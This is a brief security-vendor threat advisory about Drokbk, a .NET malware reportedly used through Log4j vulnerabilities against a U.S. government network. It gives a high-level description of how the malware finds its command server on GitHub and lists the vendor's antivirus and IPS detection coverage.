Cobalt Mirage Affiliate Deployed Drokbk Malware


FortiGuard Labs is aware of a report that the "Cluster B" group who is an alleged affiliate to the Iranian threat actor "Cobalt Mirage" deployed Drokbk malware to victims' machines. Drokbk uses Github to retrieve a Command-and-Control (C2) server location. According to the report, the Cluster B threat actor was observed to have used Drokbk in an attack against a U.S. government network in early 2022.

Why is this Significant?

This is significant because Drokbk malware was reportedly deployed to a compromised U.S. government networks in early 2022. Security vendor Secureworks attributed Drokbk to the "Cluster B" group who is an affiliate to an alleged Iranian threat actor "Cobalt Mirage".

What is Drokbk Malware?

Drokbk is a .NET malware which prime functionality is to execute remote commands served from its Command-and-Control (C2) servers. The malware is designed to retrieve C2 locations from publicly available services such as Github.

According to Secureworks, Drokbk was deployed to a U.S. government network in early February 2022 compromised by leveraging Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046).

FortiGuard Labs previously released Outbreak Alert and Threat Signal for Log4j vulnerabilities. See the Appendix for a link to "Outbreak Alert: Apache Log4j2 Vulnerability" and "Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228)".

What is the Status of Coverage?

FortiGuard Labs detect available samples in the report with the following AV signatures:

  • MSIL/Agent.3606!tr
  • W64/MaliceyElie.84DB!tr
  • W32/PossibleThreat
  • PossibleThreat

FortiGuard Labs has IPS coverage in place for CVE-2021-44228 and CVE-2021-45046:

  • Apache.Log4j.Error.Log.Remote.Code.Execution

All network IOCs in the report are blocked by Webfiltering.